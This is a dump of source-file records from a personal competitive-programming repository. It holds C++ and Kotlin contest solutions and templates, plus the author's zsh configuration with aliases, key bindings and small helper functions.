ll temp = n * (2 * R + 2 * n - 1);\n return temp;\n}\n\nll test()\n{\n ll R, t, n, l, r, s;\n cin >> R >> t;\n l = 0;\n r = min(1000000000000000001ull / R, 2000000000ull);\n while (true)\n {\n n = (l + r) / 2;\n s = ss(n, R);\n if (s < t)\n l = n; else\n if (s > t)\n r = n; else\n return n;\n if (l + 1 >= r)\n return (ss(r, R) <= t ? r : l);\n }\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n freopen(\"output.txt\", \"w+\", stdout);\n int T;\n readln(T);\n for (int tttt = 0; tttt < T; tttt++)\n {\n printf(\"Case #%d: \", tttt + 1);\n cout << test() << \"\\n\";\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5953272581100464, "alphanum_fraction": 0.622733473777771, "avg_line_length": 30.09242057800293, "blob_id": "1f62cfa847cea166b0d382667c5c332cd45850bb", "content_id": "4addf592359fa23585b39c9ce090cab4effeaee8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 19137, "license_type": "no_license", "max_line_length": 629, "num_lines": 541, "path": "/setup/zshrc", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#FONT: monospace regular\nexport LANG=en_US.UTF-8\nexport LC_CTYPE=\"en_US.UTF-8\"\nexport LC_NUMERIC=\"ru_RU.UTF-8\"\nexport LC_TIME=\"ru_RU.UTF-8\"\nexport LC_COLLATE=\"en_US.UTF-8\"\nexport LC_MONETARY=\"en_US.UTF-8\"\nexport LC_MESSAGES=\"en_US.UTF-8\"\nexport LC_PAPER=\"en_US.UTF-8\"\nexport LC_NAME=\"en_US.UTF-8\"\nexport LC_ADDRESS=\"ru_RU.UTF-8\"\nexport LC_TELEPHONE=\"ru_RU.UTF-8\"\nexport LC_MEASUREMENT=\"ru_RU.UTF-8\"\nexport LC_IDENTIFICATION=\"ru_RU.UTF-8\"\n\nexport LANGUAGE=en_US.UTF-8\n\nexport CONSOLEFONT=\"cyr-sun16\"\nexport JAVA_HOME=/usr/lib/jvm/java-11-openjdk\nfpath=(~/.zsh/completion $fpath) \n# Lines configured by zsh-newuser-install\nHISTFILE=~/.histfile\nHISTSIZE=10000\nSAVEHIST=10000\nbindkey -e\n# End of lines configured by zsh-newuser-install\n# The following lines were added by compinstall\nzstyle :compinstall filename '/home/igorjan/.zshrc'\n\nautoload -Uz compinit\ncompinit\n# End of lines added by compinstall\nbindkey '\\e[3~' delete-char # del\nbindkey '\u001b[1;5D' backward-word #ctrl+left \nbindkey '\u001b[1;5C' forward-word #ctrl+right\nbindkey '\u001b[4~' end-of-line\nbindkey '\u001b[1~' beginning-of-line\n\n[[ -n ${key[Home]} ]] && bindkey \"${key[Home]}\" beginning-of-line\n[[ -n ${key[End]} ]] && bindkey \"${key[End]}\" end-of-line\n[[ -n ${key[Insert]} ]] && bindkey \"${key[Insert]}\" overwrite-mode\n[[ -n ${key[Delete]} ]] && bindkey \"${key[Delete]}\" delete-char\n[[ -n ${key[Up]} ]] && bindkey \"${key[Up]}\" up-line-or-history\n[[ -n ${key[Down]} ]] && bindkey \"${key[Down]}\" down-line-or-history\n[[ -n ${key[Left]} ]] && bindkey \"${key[Left]}\" backward-char\n[[ -n ${key[Right]} ]] && bindkey \"${key[Right]}\" forward-char\n[[ -n ${key[Backspace]} ]] && bindkey \"${key[Backspace]}\" backward-delete-char\nzmodload -a zsh/stat stat\nzmodload -a zsh/zpty zpty\nzmodload -a zsh/zprof zprof\nzmodload -ap zsh/mapfile mapfile\n\n# Completions \n\nzstyle ':completion:*' group-name ''\nzstyle ':completion:*' matcher-list 'm:{a-z}={A-Z}'\nzstyle ':completion:*' verbose yes\nzstyle ':completion:*:*:(^rm):*:*files' ignored-patterns '*?.o' '*?.c~''*?.old' '*?.pro'\nzstyle ':completion:*:*:-subscript-:*' tag-order indexes parameters\nzstyle ':completion:*:*:kill:*:processes' list-colors \"=(#b) #([0-9]#)*=$color[cyan]=$color[red]\"\nzstyle ':completion:*::::' completer _expand _complete _ignored _approximate\nzstyle ':completion:*:corrections' format '%B%d (errors: %e)%b'\nzstyle ':completion:*:descriptions' format '%B%d%b'\nzstyle ':completion:*:expand:*' tag-order all-expansions\nzstyle ':completion:*:functions' ignored-patterns '_*'\nzstyle ':completion:*:messages' format '%d'\nzstyle ':completion:*:processes' command 'ps -au$USER' \nzstyle ':completion:*:warnings' format 'No matches for: %d'\nzstyle -e ':completion:*:approximate:*' max-errors 'reply=( $(( ($#PREFIX+$#SUFFIX)/3 )) numeric )'\n# менюшку нам для автокомплита \nzstyle ':completion:*' menu yes select\n\n# \n# различные опцие шела \n# \n# Позволяем разворачивать сокращенный ввод, к примеру cd /u/sh в /usr/share \nautoload -U ~/.zsh/completion/*(:t)\nautoload -Uz compinit && compinit\n\n# файл истории команд \nHISTFILE=~/.zhistory\n\n# Число команд, сохраняемых в HISTFILE \nSAVEHIST=10000\n\n# Дополнение файла истории \nsetopt APPEND_HISTORY\n\n# Игнорировать все повторения команд \n# setopt HIST_IGNORE_ALL_DUPS\n\n# Игнорировать лишние пробелы \n#setopt HIST_IGNORE_SPACE\n\n# не пищать при дополнении или ошибках \nsetopt NO_BEEP\n\n# если набрали путь к директории без комманды CD, то перейти \nsetopt AUTO_CD\n\n# исправлять неверно набранные комманды \nsetopt CORRECT_ALL\n\n# zsh будет обращаться с пробелами так же, как и bash \nsetopt SH_WORD_SPLIT\n\n# последние комманды в начале файла\nsetopt histexpiredupsfirst\n\n# ещё всякая херь про истоию \nsetopt histignoredups histnostore histverify extended_history share_history\n\n# Установка и снятие различных опций шелла \nsetopt notify globdots correct pushdtohome cdablevars autolist\nsetopt correctall autocd recexact longlistjobs\nsetopt autoresume histignoredups pushdsilent noclobber\nsetopt autopushd pushdminus extendedglob rcquotes mailwarning\nunsetopt bgnice autoparamslash\n\n# Не считать Control+C за выход из оболочки \nsetopt IGNORE_EOF\n\n# автоматическое удаление одинакового из этого массива \ntypeset -U path cdpath fpath manpath\n\n# загружаем список цветов \nautoload colors && colors\n\n# \n# Установка PROMT \n# \n# левый \n# вопрос на автокоррекцию \n#PROMPT='zsh: Заменить '\\''%R'\\'' на '\\''%r'\\'' ? [Yes/No/Abort/Edit] '\n\n# заголовки и прочее. \n\nprecmd() {\n [[ -t 1 ]] || return\n\tcase $TERM in\n *xterm*|rxvt|(dt|k|E|a)term*) print -Pn \"\\e]0;[%~] %m\\a\"\t;;\n screen(-bce|.linux)) print -Pn \"\\ek[%~]\\e\\\" && print -Pn \\\"\\e]0;[%~] %m (screen)\\a\" ;;\n\tesac\n}\n\npreexec() {\n\t[[ -t 1 ]] || return\n\tcase $TERM in\n *xterm*|rxvt|(dt|k|E|a)term*) print -Pn \"\\e]0;<$1> [%~] %m\\a\" ;;\n screen(-bce|.linux)) print -Pn \"\\ek<$1> [%~]\\e\\\" && print -Pn \\\"\\e]0;<$1> [%~] %m (screen)\\a\" ;; #заголовок для скрина\n\tesac\n}\ntypeset -g -A key\n\n# \n# экранируем спецсимволы в url, например &, ?, ~ и так далее \nautoload -U url-quote-magic\nzle -N self-insert url-quote-magic\n\n# \n# мои хоткеи \n# \n# дополнение по истории, ^X^Z включить ^Z выключить \nautoload -U predict-on\nzle -N predict-on\nzle -N predict-off\nbindkey -M emacs \"^X^Z\" predict-on\nbindkey -M emacs \"^Z\" predict-off\n\n# peжuм нaвuгaцuu в cтuлe emacs \nbindkey -e\n\n# режим редактирования команды, вызывает для этого то что в $EDITOR \nautoload -U edit-command-line\n\n# Вызов редактора для редактирования строки ввода (хоткей в стиле emacs) \n# bindkey -M vicmd v edit-command-line для командного режима vi \nzle -N edit-command-line\nbindkey -M emacs \"^X^E\" edit-command-line\n\n#завершить слово команду \nbindkey -M emacs \"^N\" complete-word\n\n#вызов диалога удаления файлов в папке \nfunction dialogrun; { rm -rf $(dialog --separate-output --checklist file 100 100 100 $(for l in $(ls -A); do echo \"$l\" \"$(test -d $l && echo \"dir\" || echo \"file\")\" 0; done) --stdout); clear }\nzle -N dialogrun\nbindkey -M emacs \"^X^O\" dialogrun\n\n# куда же мы без калькулятора \nautoload -U zcalc\n\n# \n# мои функции \n# \nccd() { cd && ls}\n\n# создать директорию и перейти в нее \nmcd(){ mkdir -p $1; cd $1 }\n\n# если текущая директория пустая, то удалить ее и перейти в родительскую директорию \nrcd(){ local P=\"`pwd`\"; cd .. && rmdir \"$P\" || cd \"$P\"; }\n\n# быстрое переименование \nname() {\n name=$1\n vared -c -p 'rename to: ' name\n command mv $1 $name\n}\n\n# распаковка архива \nextract () {\n if [ -f $1 ] ; then\n case $1 in\n *.tar.bz2) tar xjf \"$1\" ;;\n *.tar.gz) tar xzf \"$1\" ;;\n *.bz2) bunzip2 \"$1\" ;;\n *.rar) unrar x \"$1\" ;;\n *.gz) gunzip \"$1\" ;;\n *.tar) tar xf \"$1\" ;;\n *.tbz2) tar xjf \"$1\" ;;\n *.tgz) tar xzf \"$1\" ;;\n *.zip) unzip \"$1\" ;;\n *.Z) uncompress \"$1\" ;;\n *.7z) 7z x \"$1\" ;;\n *) echo \"я не в курсе как распаковать '$1'...\" ;;\n esac\n else\n echo \"'$1' is not a valid file\"\n fi\n}\n\n# упаковка в архив \npk () {\n if [ $1 ] ; then\n case $1 in\n tbz) \ttar cjvf \"$2\".tar.bz2 \"$2\" ;;\n tgz) \ttar czvf \"$2\".tar.gz \"$2\" \t;;\n tar) \ttar cpvf \"$2\".tar \"$2\" ;;\n\t\t\tbz2)\tbzip \"$2\" ;;\n gz)\t\tgzip -c -9 -n \"$2\" > \"$2\".gz ;;\n\t\t\tzip) \tzip -r \"$2\".zip \"$2\" ;;\n 7z) \t7z a \"$2\".7z \"$2\" ;;\n *) \techo \"'$1' cannot be packed via pk()\" ;;\n esac\n else\n echo \"'$1' is not a valid file\"\n fi\n}\n\n# mp3 в нормальную кодировку \nmp32utf() { find -iname '*.mp3' -print0 | xargs -0 mid3iconv -eCP1251 --remove-v1 }\n\n# top по имени процесса, правда только по полному \npidtop() {top -p `pidof $@ | tr ' ' ','`}\n\n# простой калькулятор \ncalc() {echo \"${1}\"|bc -l;}\n\n# мой айпишник \nmyip() {lynx --source http://www.formyip.com/ |grep The | awk {'print $5'}}\n\n# великий рандом для перемешивания строк в файле \nrand() { awk '{print rand()\"\\t\"$0}'|sort|awk -F'\\t' '{print $2}' }\n\n# копипаст в консоли \nccopy(){ cp $1 /tmp/ccopy.$1; }\nalias cpaste=\"ls /tmp/ccopy.* | sed 's|/tmp/ccopy.||' | xargs -I % mv /tmp/ccopy.% ./%\"\n\n# \n# переменные окружения и прочая чушь \n# \n# перенаправляем\nREADNULLCMD=${PAGER}\n\n#оформим подсветку в grep \nexport GREP_COLOR=\"1;33\"\n\n# если стоит most то заюзаем в качестве $PAGER \n[[ -x $(whence -p most) ]] && export PAGER=$(whence -p most)\n\n# редактор по дефолту \nexport EDITOR=/usr/local/bin/vim\n\nautoload zkbd\n[[ ! -f $HOME/.zkbd/konsole-:0 ]] && zkbd\n[[ -f $HOME/.zkbd/konsole-:0 ]] && source $HOME/.zkbd/konsole-:0\n\n[[ -n ${key[Backspace]} ]] && bindkey \"${key[Backspace]}\" backward-delete-char\n[[ -n ${key[Insert]} ]] && bindkey \"${key[Insert]}\" overwrite-mode\n[[ -n ${key[Home]} ]] && bindkey \"${key[Home]}\" beginning-of-line\n[[ -n ${key[PageUp]} ]] && bindkey \"${key[PageUp]}\" up-line-or-history\n[[ -n ${key[Delete]} ]] && bindkey \"${key[Delete]}\" delete-char\n[[ -n ${key[End]} ]] && bindkey \"${key[End]}\" end-of-line\n[[ -n ${key[PageDown]} ]] && bindkey \"${key[PageDown]}\" down-line-or-history\n[[ -n ${key[Up]} ]] && bindkey \"${key[Up]}\" up-line-or-search\n[[ -n ${key[Left]} ]] && bindkey \"${key[Left]}\" backward-char\n[[ -n ${key[Down]} ]] && bindkey \"${key[Down]}\" down-line-or-search\n[[ -n ${key[Right]} ]] && bindkey \"${key[Right]}\" forward-char\n# пути где искать бинарники \nexport PATH;\n\n\n# ООо и русские имена файлов \nexport OOO_FORCE_DESKTOP=gnome\n\n# забыл зачем ставил \nexport LESSCHARSET=UTF-8\n\n#разукрашиваем ls и автодополнение \nexport LS_COLORS='no=00;37:fi=00;37:di=01;36:ln=04;36:pi=33:so=01;35:do=01;35:bd=33;01:cd=33;01:or=31;01:su=37:sg=30:tw=30:ow=34:st=37:ex=01;31:*.cmd=01;31:*.exe=01;31:*.com=01;31:*.btm=01;31:*.sh=01;31:*.run=01;31:*.tar=33:*.tgz=33:*.arj=33:*.taz=33:*.lzh=33:*.zip=33:*.z=33:*.Z=33:*.gz=33:*.bz2=33:*.deb=33:*.rpm=33:*.jar=33:*.rar=33:*.jpg=32:*.jpeg=32:*.gif=32:*.bmp=32:*.pbm=32:*.pgm=32:*.ppm=32:*.tga=32:*.xbm=32:*.xpm=32:*.tif=32:*.tiff=32:*.png=32:*.mov=34:*.mpg=34:*.mpeg=34:*.avi=34:*.fli=34:*.flv=34:*.3gp=34:*.mp4=34:*.divx=34:*.gl=32:*.dl=32:*.xcf=32:*.xwd=32:*.flac=35:*.mp3=35:*.mpc=35:*.ogg=35:*.wav=35:*.m3u=35:';\nzstyle ':completion:*:default' list-colors ${(s.:.)LS_COLORS}\n\n# значение цветов # 30 черный текст # 40 черный фон\n# 00 восстановление цвета по умолчанию # 31 красный текст # 41 красный фон\n# 01 включить яркие цвета # 32 зеленый текст # 42 зеленый фон\n# 04 подчеркнутый текст # 33 желтый (или коричневый) текст # 43 желтый (или коричневый) фон\n# 05 мигающий текст # 34 синий текст # 44 синий фон\n# ну или color юзать # 35 фиолетовый текст # 45 фиолетовый фон\n# # 36 cyan текст # 46 cyan фон\n# алиасы # 37 белый (или серый) текст # 47 белый (или серый) фон\n# \n# цветной grep \nalias grep='grep --color=auto'\n\n# более человекочитаемые df и du \nalias df='df -h'\nalias du='du -h'\n\n# переименование-перемещение c пogтвepжgeнueм без коррекции \nalias mv='nocorrect mv -i'\n\n# рекурсивное копирование с подтверждением без коррекции \nalias cp='nocorrect cp -iR'\nalias scp='scp -r'\n\n# удаление с подтверждением без коррекции \nalias rm='nocorrect rm -i'\n\n# принудимтельное удаление без коррекции \nalias rmf='nocorrect rm -f'\n\n# принудительное рекурсивное удаление без коррекции \nalias rmrf='nocorrect rm -fR'\n\n# создание каталогов без коррекции \nalias mkdir='nocorrect mkdir'\n\n# разукрашиваем некоторые команды с помощью grc \n[[ -f /usr/bin/grc ]] && {\n alias ping=\"grc --colour=auto ping\"\n alias traceroute=\"grc --colour=auto traceroute\"\n alias make=\"grc --colour=auto make -s\"\n alias diff=\"grc --colour=auto diff\"\n alias cvs=\"grc --colour=auto cvs\"\n alias netstat=\"grc --colour=auto netstat\"\n}\n\n# разукрашиваем логи с помощью grc \nalias logc=\"grc cat\"\nalias logt=\"grc tail\"\nalias logh=\"grc head\"\n\n# \n# запуск программ \n# \n# везде \nalias py='python'\n\n# в иксах \nalias -s {png,gif,jpg,jpeg}=feh\nalias -s {pdf,djvu}=evince\n\n# без иксов \n[[ -z $DISPLAY ]] && {\n\talias -s {odt,doc,sxw,xls,doc,rtf}=catdoc\n\talias -s {png,gif,jpg,jpeg}=\"fbi -a\"\n\talias -s {pdf,djvu}=evince\n setfont cyr-sun16\n}\n\n# html сам пусть соображает чё запускать \nautoload -U pick-web-browser\nalias -s {html,htm}=pick-web-browser\n\n# \n# глобальные алиасы \n# \nalias -g H=\"| head\"\nalias -g T=\"| tail\"\nalias -g G=\"| grep\"\nalias -g L=\"| less\"\nalias -g M=\"| most\"\n#alias -g B=\"&|\"\nalias -g HL=\"--help\"\nalias -g LL=\"2>&1 | less\"\nalias -g CA=\"2>&1 | cat -A\"\nalias -g TABLE=\"| column -t\"\nalias -g NE=\"2> /dev/null\"\nalias -g NUL=\"> /dev/null 2>&1\"\n\n\n# \n# sudo \nalias halt=\"sudo halt\"\nalias reboot=\"sudo reboot\"\nalias gparted=\"sudo gparted\"\n\n# родной скрин \nalias screen=\"screen -DR\"\n\n# ну так привычнее :) \nalias ncmpc=\"ncmpcpp\"\nalias mou=\"mousepad\"\n\n# lastfm \nalias shell-fm=\"shell-fm lastfm://user/tiss93\"\n\n# список удаленных файлов с NTFS, FAT, UFS1/2, FFS, Ext2 и Ext3 \n# пакет sleuthkit, утилита icat для восстановления \nalias fls=\"fls -rd\"\n\n# показываев дерево директорий \nalias dirf='find . -type d | sed -e \"s/[^-][^\\/]*\\// |/g\" -e \"s/|\\([^ ]\\)/|-\\1/\"'\n\n# grep по ps aux \nalias psgrep='ps aux | grep $(echo $1 | sed \"s/^\\(.\\)/[\\1]/g\")'\n\n# удаляем пустые строки и комментарии \nalias delspacecomm=\"sed '/ *#/d; /^ *$/d' $1\"\n\n# \n# команды при запуске zsh \n# \nPROMPT=$'%{\\e[1;32m%}%n %{\\e[1;36m%}{%?} %{\\e[1;37m%}%~'\n\nif [[ $EUID == 0 ]] \nthen\nPROMPT+=$' #%{\\e[0m%} ' # user dir %\nelse\nPROMPT+=$' %#%{\\e[0m%} ' # root dir #\nfi\n\n# Make ^Z toggle between ^Z and fg\nfunction ctrlz() {\n if [[ $#BUFFER == 0 ]]; then\n fg >/dev/null 2>&1 && zle redisplay\n else\n zle push-input\n fi\n}\n\nzle -N ctrlz\nbindkey '^Z' ctrlz\n\nalias ls='ls -Bh\t --color=auto'\nalias l='ls -lhF --group-directories-first --color=auto'\nalias grep='grep --colour=auto'\nexport PATH=\"/home/igorjan/206round/timetable:${PATH}\"\nexport PATH=\"/home/igorjan/206round/staff:${PATH}\"\nexport PATH=\"/home/igorjan/206round/vk200/out:${PATH}\"\nexport PATH=\"/home/igorjan/206round/scripts:${PATH}\"\nexport PATH=\"/home/igorjan/cpt:${PATH}\"\n\n\nalias h='htop'\n\nunsetopt correct_all\nalias show_random_file_or_directory='ls | sed -n \"$((RANDOM%$(ls | wc -l)+1))p\"'\nalias v='/usr/local/bin/vim -p'\nalias vim='/usr/local/bin/vim -p'\nalias fuck='sudo $(fc -ln -1)'\nalias x='sudo $(fc -ln -1)'\nalias блядь='sudo $(fc -ln -1)'\nalias nano='vi'\n\ntoBackup() {cp \"$1\" \"$1.backup\"}\nfromBackup() {cp \"$1.backup\" \"$1\"}\nswapBackup() {cp \"$1\" \"$1.backup.temp\"; cp \"$1.backup\" \"$1\"; mv -f \"$1.backup.temp\" \"$1.backup\"}\nalias getstats=\"cat $HISTFILE | grep -E '^:\\s([0-9]+):([0-9]+);(\\w+)(.*)' | sed -r -e 's/^: ([0-9]+):0;(\\w+)(.*)/\\2/g' | sort | uniq -c | sort -n\"\nalias getstatsfull=\"cat $HISTFILE | grep -E '^:\\s([0-9]+):([0-9]+);(\\w+)(.*)' | sed -r -e 's/^: ([0-9]+):0;(\\w+)/\\2/g' | sort | uniq -c | sort -n\"\n\nalias wrc='/usr/local/bin/vim ~/.config/awesome/rc.lua'\nalias vrc='/usr/local/bin/vim ~/.vimrc'\nalias zrc='/usr/local/bin/vim ~/.zshrc'\nalias plugin='/usr/local/bin/vim ~/.vim/bundle/codeforces.vim/autoload'\nalias toPlugin='cd ~/.vim/bundle/codeforces.vim'\nalias cf='cd ~/206round/CodeForce/'\nalias java8='/usr/lib/jvm/java-8-openjdk/bin/java'\nalias sudo='/bin/sudo'\n\nalias pacman='sudo pacman'\nalias :q='exit'\nalias :wq='exit'\n\ncat ~/two_guys.txt\n\nalias notNeededPackages=\"pacman -Qdt | ack '(.*? )' --output '$1'\"\nalias installedPackages=\"pacman -Qet | ack '(.*? )' --output '$1'\"\n\nalias makeTimelapse='ffmpeg -r 8 -y -pattern_type glob -i \"*.JPG\" -pix_fmt yuv420p timelapse.mp4'\n\nsource /usr/share/zsh/plugins/zsh-autosuggestions/zsh-autosuggestions.zsh\nsource /usr/share/zsh/plugins/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh\nsource /usr/share/fzf/completion.zsh\n\nZSH_AUTOSUGGEST_PARTIAL_ACCEPT_WIDGETS+=(forward-char vi-forward-char vi-add-eol)\nZSH_AUTOSUGGEST_ACCEPT_WIDGETS=(end-of-line)\nZSH_HIGHLIGHT_STYLES[path]=none\nZSH_HIGHLIGHT_STYLES[globbing]=none\nZSH_HIGHLIGHT_STYLES[history-expansion]=none\n\ncorrect755 () {\n find * -type d -print0 | xargs -0 chmod 0755\n find . -type f -print0 | xargs -0 chmod 0644\n}\n\nalias fix755=correct755\n\ncommand_not_found_handler () {\n if [[ $@ =~ ^[A-Z] ]]; then\n printf \"НЕ ОРИ НА КОНСОЛЬ!!!\\n\"\n else\n printf \"Иди нафиг, я не нашел $@\\n\"\n fi\n return $?\n}\n\ninstall () {\n pacman -S $@ || yaourt -S --noconfirm $@ || yaourt -Ss $@\n}\nalias install=install\nset visualbell\n\nalias removeUnneededPackages=\"pacman -Rns \\$(pacman -Qtdq)\"\n\nsetopt COMPLETE_ALIASES\nzstyle ':completion::complete:*' gain-privileges 1\nzstyle ':completion:*' rehash true\nalias -g ...='../..'\nalias -g ....='../../..'\nalias -g .....='../../../..'\n" }, { "alpha_fraction": 0.46927592158317566, "alphanum_fraction": 0.4892368018627167, "avg_line_length": 26.771739959716797, "blob_id": "022051206403205f1a803bfb967eab5f677f1d24", "content_id": "07646e9a56258adf56fb150631c58a4eb1712c58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2555, "license_type": "no_license", "max_line_length": 96, "num_lines": 92, "path": "/CodeForce/1170/TemplateSegmentTree.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*// {{{\nimport kotlin.math.*\nimport kotlin.collections.*// }}}\n\nprivate fun PrintWriter.readSolveWrite() {\n val (n) = readln()\n val a = readln()\n val (q) = readln()\n build(a, 0, 0, n - 1)\n for (i in 1..q) {\n val (l, r) = readln()\n writeln(get(l, r, n))\n }\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate val MAX_N = 500_000\nprivate val t = IntArray(4 * MAX_N + 1)\n\nprivate fun build(a: IntArray, p: Int, tl: Int, tr: Int): Int {\n val x = if (tl == tr) {\n a[tl]\n } else {\n val m = (tl + tr) / 2\n max(\n build(a, 2 * p + 1, tl, m),\n build(a,2 * p + 2, m + 1, tr)\n )\n }\n t[p] = x\n return x\n}\n\nprivate fun get0(p: Int, tl: Int, tr: Int, l: Int, r: Int): Int {\n if (l > r) return -1\n if (l == tl && r == tr) return t[p]\n val m = (tl + tr) / 2\n return max(\n get0(2 * p + 1, tl, m, l, min(r, m)),\n get0(2 * p + 2, m + 1, tr, max(l, m + 1), r)\n )\n}\n\nprivate fun get(l: Int, r: Int, n: Int): Int = get0(0, 0, n - 1, l, r)\n\nprivate fun writeln(vararg params: Any) = println(params.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\ndata class Pt(val x: Int, val y: Int, val i: Int, var ans: Int)\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.48233774304389954, "alphanum_fraction": 0.49184367060661316, "avg_line_length": 35.25957489013672, "blob_id": "18d7db404a306b9070ac5c984236dfcc5e053367", "content_id": "8df73247fc6992b06c6c384f07094a20790fd0ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8521, "license_type": "no_license", "max_line_length": 163, "num_lines": 235, "path": "/CodeForce/1014/A2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define SZ(a) (int(a.size()))\n#define contains(s, value) (s.find(value) != s.end())\n\n#define ints(a...) int a; readln(a)\n#define strings(a...) string a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n \nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n \nvoid writeln(){cout<<\"\\n\";}ttti void print(T a);ttti void priws(T a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H h,T...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//}}}\n///-------------------------------------------------------------------------------------------------------------------------------------\n\nvoid run()\n{\n ints(n, s, c, h, u);\n strings(pattern, bottles);\n cerr.precision(7);\n cerr << fixed;\n vector<int> next(2 * n);\n\n { //{{{\n string dpattern = pattern + pattern;\n map<char, int> last;\n fori(n * 2)\n {\n if (contains(last, dpattern[i]))\n next[last[dpattern[i]]] = i;\n last[dpattern[i]] = i;\n }\n } //}}}\n auto getPatternColor = [&](int position) {\n return pattern[position % n];\n };\n auto getNextColor = [&](int index) {\n int mod = index % n;\n int real = index - mod;\n return real + next[mod];\n };\n\n auto getAnswer = [&](int runNumber) {\n double time = clock();\n set<int> hams;\n map<int, int> numbers;\n fori(u) hams.insert(i), numbers[i] = i;\n string currentBottles = bottles.substr(0, h);\n int nextBottle = h;\n vector<pair<int, char>> actions;\n\n auto getNextBottle = [&]() {\n if (nextBottle >= SZ(bottles))\n return '*';\n return bottles[nextBottle++];\n };\n auto useBottle = [&](int index) {\n auto temp = getNextBottle();\n if (temp == '*')\n currentBottles.erase(index);\n else\n currentBottles[index] = temp;\n };\n auto getFreePlace = [&](int position, char color) {\n position++;\n while (getPatternColor(position) != color) ++position;\n while (contains(hams, position)) position = getNextColor(position);\n return position;\n };\n auto getFreeHams = [&](int position, char color) {\n set<int> ans = hams;\n ans.erase(position);\n position++;\n while (getPatternColor(position) != color) ++position;\n while (contains(hams, position)) ans.erase(position), position = getNextColor(position);\n return ans;\n };\n\n auto shoot = [&](int position, int bottle, int nextPlace) {\n hams.erase(position);\n actions.emplace_back(numbers[position], currentBottles[bottle]);\n hams.insert(nextPlace);\n numbers[nextPlace] = numbers[position];\n numbers.erase(position);\n useBottle(bottle);\n };\n auto getBottleIndex = [&](int position, bool force) -> pii {\n set<char> used = {'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J'};\n int mx = 0;\n int index = -1;\n int i = 0;\n for (char c: currentBottles)\n {\n if (contains(used, c))\n if (int nextPlace = getFreePlace(position, c); nextPlace > mx)\n mx = nextPlace,\n index = i;\n ++i;\n used.erase(c);\n }\n //if (false)\n if (!force && nextBottle < SZ(bottles))\n {\n int iii = 2;//runNumber % 3 + 1;\n //runNumber % 15 < 3 ? 1 :\n //runNumber % 15 < 13 ? 2 :\n //(1 + rand() % 2);\n string&& temp = bottles.substr(nextBottle, iii);\n for (char c: temp)\n if (contains(used, c))\n if (int nextPlace = getFreePlace(position, c); nextPlace > mx)\n return {-1, c};\n }\n return {index, mx};\n };\n\n fori(s)\n {\n int bottleIndex, nextPlace;\n int found = -1;\n for (int ham: hams)\n {\n tie(bottleIndex, nextPlace) = getBottleIndex(ham, false);\n if (bottleIndex != -1)\n {\n found = ham;\n break;\n }\n }\n if (found == -1)\n {\n int first = *hams.begin();\n auto [bi, color] = getBottleIndex(first, false);\n auto free = getFreeHams(first, color);\n\n if (SZ(free) == 0)\n {\n int index = rand() % SZ(hams);\n found = *hams.begin();\n index %= 2;\n for (auto it = hams.begin(); index-- > 0; found = *(++it));\n tie(bottleIndex, nextPlace) = getBottleIndex(found, true);\n }\n else\n {\n int index = rand() % SZ(free);\n found = *free.begin();\n index %= 4;\n for (auto it = free.begin(); index-- > 0; found = *(++it));\n 